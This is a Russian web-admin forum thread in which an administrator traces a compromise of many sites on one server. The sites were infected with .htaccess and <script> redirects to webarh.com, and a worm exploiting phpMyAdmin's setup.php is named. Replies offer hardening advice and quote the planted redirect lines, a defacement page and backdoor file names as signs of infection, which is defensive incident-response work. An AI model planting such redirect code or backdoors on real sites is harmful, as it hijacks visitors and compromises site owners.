форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка

Вариант для распечатки		Пред. тема | След. тема
Форум WEB технологии (.htaccess, паролирование)
Изначальное сообщение		[ Отслеживать ]

"Взлом через подмену htaccess"	+/–
Сообщение от DJ_Kill (??) on 12-Окт-10, 10:14
Система  FreeBSD 7.0-RELEASE Сервер: Apache 2.2.6_2 На сервере живёт зоопарк сайтов (это не хостинг, но всё же) и несколько разных систем управления всем этим. Последние несколько дней раз в сутки во всех директориях на сервере появляется файлик .htaccess следующего содержания: RewriteEngine On^M RewriteBase /^M RewriteRule ^(.*)? http://webarh.com/r.php Имя сайта может быть любым. Главное что редирект на r.php куда-то. В логах по всем сайтам ничего толкового найти не могу. То есть нигде нет добавления этого файла. Файл идёт с правами апача в те директории, куда апачу разрешена запись (аплоад) по тем или иным причинам. Редирект на "хостинге" нужен. Помогите отловить проблему. С какой стороны, хотя бы, к ней подойти. Догадываюсь что вопрос чайницкий...
Высказать мнение | Ответить | Правка | Cообщить модератору

Сообщения по теме

[Сортировка по времени | RSS]

1. "Взлом через подмену htaccess"	+/–
Сообщение от Pahanivo (ok) on 12-Окт-10, 10:38
льют через дыру гдето http или ftp для начала по быстрому все нужные настройки для htaccess пропиши в конфиге сервака для соотв директорий и пропиши "AllowOverride None" для всех сайтов проверь конфиги на права - запрети запись - только чтение! настрой подробыные логи если таких нет, желательно для каждого сайта отдельным файлом, настрой лог ftp далее начинай внимательно изучать
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	2. "Взлом через подмену htaccess"	+/–
	Сообщение от Pahanivo (ok) on 12-Окт-10, 10:40
	на веб скорей всего прикручен пых - для него тоже надо сделать соотв ограничения по директориям + включить сейфмод
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	4. "Взлом через подмену htaccess"	+/–
	Сообщение от DJ_Kill (??) on 12-Окт-10, 10:50
	> на веб скорей всего прикручен пых - для него тоже надо сделать > соотв ограничения по директориям А можно попродробнее, плиз. > включить сейфмод Точно. Сделал. Буду наблюдать.
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	5. "Взлом через подмену htaccess"	+/–
	Сообщение от Pahanivo (ok) on 12-Окт-10, 10:58
	>> на веб скорей всего прикручен пых - для него тоже надо сделать >> соотв ограничения по директориям > А можно попродробнее, плиз. httpd.conf: <VirtualHost *:80> ...     php_admin_flag safe_mode on     php_admin_flag safe_mode_gid on     php_admin_value safe_mode_include_dir /www/somesite.ru/htdocs     php_admin_value safe_mode_exec_dir /www/somesite.ru/htdocs     php_admin_value safe_mode_allowed_env_vars PHP_     php_admin_value open_basedir /www/somesite.ru/htdocs     php_admin_value upload_tmp_dir /www/somesite.ru/htdocs/tmp     php_admin_value session.save_path /www/somesite.ru/htdocs/tmp </VirtualHost> также лучше временно запретить функции работы с файлами ... короче доки php.net
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	6. "Взлом через подмену htaccess"	+/–
	Сообщение от Pahanivo (ok) on 12-Окт-10, 11:00
	>[оверквотинг удален] >     php_admin_flag safe_mode_gid on >     php_admin_value safe_mode_include_dir /www/somesite.ru/htdocs >     php_admin_value safe_mode_exec_dir /www/somesite.ru/htdocs >     php_admin_value safe_mode_allowed_env_vars PHP_ >     php_admin_value open_basedir /www/somesite.ru/htdocs >     php_admin_value upload_tmp_dir /www/somesite.ru/htdocs/tmp >     php_admin_value session.save_path /www/somesite.ru/htdocs/tmp > </VirtualHost> > также лучше временно запретить функции работы с файлами ... > короче доки php.net после этого смотреть errorl.log - попытки шарится по чужим дирам должны будут логироваться
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	7. "Взлом через подмену htaccess"	+/–
	Сообщение от DJ_Kill (??) on 12-Окт-10, 11:20
	> safe_mode on > safe_mode_gid on Я вот это глобально для всего PHP включил. > также лучше временно запретить функции работы с файлами ... Тогда сервер перестанет работать, к сожалению... В общем, чищу сервер - жду новой волны файловой атаки...
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	11. "Взлом через подмену htaccess"	+/–
	Сообщение от sHaggY_caT (ok) on 16-Окт-10, 00:55
	>> safe_mode on >> safe_mode_gid on > Я вот это глобально для всего PHP включил safe mode ничего не дает, это иллюзия безопасности, так как запросто обходится. В PHP 6 его уже не будет именно по причине бесполезности! Кроме того, safe_mode откровенно глючит с кучей CMS, и официально не рекомендуется теми же Joomla, Drupal, да, наверное, вообще практически всеми популярными CMS! То есть, от него _нет_ пользы(разве что, на взлом потребуется чуть-чуть больше времени), но есть вред. По-настоящему помогают только open_base_dir, отключение ненужных функций PHP,  сухосин-патч и mod_security. Первый маст-хэв вообще везде (если нужен ImageMagick, convert запросто включается в дополнительный path через двоеточие), второе крайне желательно тоже везде (во всяком случае, хосты, для которых слишком много разрешено функций стоит вынести на отдельную виртуалку или контейнер), сухосин-патч обозначает тормоза (не годно для хостинга), а мод_секюрити требует утомительной ручной настройки. >> также лучше временно запретить функции работы с файлами ... > Тогда сервер перестанет работать, к сожалению... Лучше расскажите, что именно ломается, если отключить, как минимум: shell_exec, exec, system, passthru, popen ? И еще раз, расскажите, что Вы перепроверяли насчет ftp? Уверяю Вас, если веб-мастер пользуется Windows, вероятность того, что это взлом через уязвимости сайта/сервера, очень мала, очень вероятно (я бы даже сказала "скорее всего"), это троян на машине этого человека, укравший ftp-пароль!
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	3. "Взлом через подмену htaccess"	+/–
	Сообщение от DJ_Kill (??) on 12-Окт-10, 10:48
	> льют через дыру гдето http или ftp Да. > для начала по быстрому все нужные настройки для htaccess пропиши в конфиге > сервака для соотв директорий и пропиши "AllowOverride None" для всех сайтов Так как 90% сайтов не используют htaccess это уже сделано. Но зараза всё равно лезет. Плюс, замечено, что ещё аналогичный редирект в виде <script>...</script> добавляется в конец всех файлов index.htm и index.html (многие "админы" сайтов держат эти файлы с разрешением на запись из апача - поубивал бы). > проверь конфиги на права - запрети запись - только чтение! Конфиги, конечно же, только чтение. > настрой подробыные логи если таких нет, желательно для каждого сайта отдельным файлом, Для всех сделано: ErrorLog /var/log/http/httpd-error.log LogLevel warn CustomLog /var/log/http/httpd-access.log combined > настрой лог ftp Стоит proftpd с подробнейшим логгированием. Но, думаю, это не он. Ибо FTP даёт на запись только директорию владельца сайта под логином и паролем, а рассылается это сразу по всем сайтам. То есть надо бы знать тогда ВСЮ базу паролей. А это уже сама система была бы сломана, что не так. > далее начинай внимательно изучать Вот не могу понять на что смотреть. Что выловить.
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	8. "Взлом через подмену htaccess"	+/–
	Сообщение от Nimdar (ok) on 12-Окт-10, 11:45
	> Стоит proftpd с подробнейшим логгированием. > Но, думаю, это не он. Ибо FTP даёт на запись только директорию > владельца сайта под логином и паролем, а рассылается это сразу по > всем сайтам. То есть надо бы знать тогда ВСЮ базу паролей. > А это уже сама система была бы сломана, что не так. Запросто. Года два назад была эпидемия этого вируса (лень искать имя) - ворует FTP пароли у клиентов (одного достаточно). Далее вредоносный код в php-скрипт, который запускается от имени апача - вуаля, и все файлы, куда пользователь апача может писать становятся доступны. Лечится полным запретом FTP доступа (use SFTP + фильтрация по ip + рассылка всем пользователям, что у кого-то поселилась зараза) + выполнение рекомендаций Pahanivo. >> далее начинай внимательно изучать > Вот не могу понять на что смотреть. Что выловить.
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	9. "Взлом через подмену htaccess"	+/–
	Сообщение от Pahanivo (ok) on 12-Окт-10, 16:48
	>[оверквотинг удален] >> А это уже сама система была бы сломана, что не так. > Запросто. Года два назад была эпидемия этого вируса (лень искать имя) - > ворует FTP пароли у клиентов (одного достаточно). Далее вредоносный код в > php-скрипт, который запускается от имени апача - вуаля, и все файлы, > куда пользователь апача может писать становятся доступны. > Лечится полным запретом FTP доступа (use SFTP + фильтрация по ip + > рассылка всем пользователям, что у кого-то поселилась зараза) + выполнение рекомендаций > Pahanivo. >>> далее начинай внимательно изучать >> Вот не могу понять на что смотреть. Что выловить. вообще для ftp доступа крайне рекомендую использовать фильтрацию по айпи персонально по аккаунтам - к сожалению очень часто трояны воруют пасы клиентов
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	10. "Взлом через подмену htaccess"	+/–
	Сообщение от sHaggY_caT (ok) on 16-Окт-10, 00:45
	> вообще для ftp доступа крайне рекомендую использовать фильтрацию по айпи персонально по > аккаунтам - к сожалению очень часто трояны воруют пасы клиентов Не часто, а это 99 и еще не одна девятка процентов во всех случаях взломов. Через дыры в CMS ломают гораздо реже! Могу утверждать это, так как два года работала в одном из самых крупных хостингов рунета (несколько тысяч серверов) Ограничение по IP работает не всегда, так как часто бот заливает вирусные вставки и другую гадость прямо со взломанной машины, не передавая логин/пароль в ботнет. Очень помогает выкинуть ftp, и использовать sftp, или, на крайний случай, ftps. Так же, еще больше помогает выкинуть Windows с рабочего места :)
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	12. "Взлом через подмену htaccess"	+/–
	Сообщение от Pahanivo (ok) on 17-Окт-10, 13:08
	> Очень помогает выкинуть ftp, и использовать sftp, или, на крайний случай, ftps. до тех пор пока боты не поумнели? )) > Так же, еще больше помогает выкинуть Windows с рабочего места :) это да )) против криворукова юзераста, который годами игнорирует присутствие троянов на собственной машине все бесполезно )))
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	17. "Взлом через подмену htaccess"	+/–
	Сообщение от universite (ok) on 05-Ноя-10, 00:12
	>> далее начинай внимательно изучать > Вот не могу понять на что смотреть. Что выловить. читай логи фтп-сервера я в подобных случаях цеплял фильтр по названию файлов и банил атакующие IP
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

13. "Взлом через подмену htaccess"	+/–
Сообщение от Pearl Diver (??) on 18-Окт-10, 10:38
>[оверквотинг удален] > RewriteBase /^M > RewriteRule ^(.*)? http://webarh.com/r.php > Имя сайта может быть любым. Главное что редирект на r.php куда-то. > В логах по всем сайтам ничего толкового найти не могу. То есть > нигде нет добавления этого файла. > Файл идёт с правами апача в те директории, куда апачу разрешена запись > (аплоад) по тем или иным причинам. > Редирект на "хостинге" нужен. > Помогите отловить проблему. С какой стороны, хотя бы, к ней подойти. > Догадываюсь что вопрос чайницкий... Сегодня пол-ночи гоняли этого виря в одной из виртуалок. 4 раза зачищали сайт, не могли понять -- где это дрянь пролезает. Обнаружили что 1) он использует уязвимость в phpmyadmin/scripts/setup.php 2.1) разбрасывает везде .htaccess вышеуказанного содержания 2.2) заражает все *.php *.htm *.html файлы строками вида <script>document.location.href='http://webarh.com/z.php';</script> 2.3) В некоторых местах оставляет штампы вида HTML  HEAD TITLE This site is defaced!!! /TITLE /HEAD BODY bgcolor="#000000" text="#FF0000" H1 This site is defaced!!! /H1 HR ADDRESS  b NeverEverNoSanity WebWorm generation 8. /b  /ADDRESS /BODY /HTML 3) ВАЖНО!!! Оставляет бэкдоры - файлы вида confg.php, cfg.php, м.б. какие-то еще. Через эти бэкдоры даже после зачистки сайта червь может вновь возврашаться. P.S. Какая версия phpmyadmin этому подвержена - х.з. Снес ее не подумавши... :(
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	14. "Взлом через подмену htaccess"	+/–
	Сообщение от DJ_Kill (??) on 18-Окт-10, 10:45
	> 1) он использует уязвимость в phpmyadmin/scripts/setup.php Именно. > 2.3) В некоторых местах оставляет штампы вида > 3) ВАЖНО!!! Вот это интересно. Проверю. > P.S. Какая версия phpmyadmin этому подвержена - х.з. Снес ее не подумавши... > :( Вся ветка 2.х. Часть веток кроме последних 2 или 3 от 3.Х
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	15. "Взлом через подмену htaccess"	+/–
	Сообщение от Pearl Diver (??) on 18-Окт-10, 19:31
	как успехи?
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	16. "Взлом через подмену htaccess"	+/–
	Сообщение от DJ Kill on 18-Окт-10, 23:31
	> как успехи? В общем, после обновки админа повторения нет. Левых файлов в структуре сайтов нет. Кроме htaccess и правки индексов - никаких других вмешательств.
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема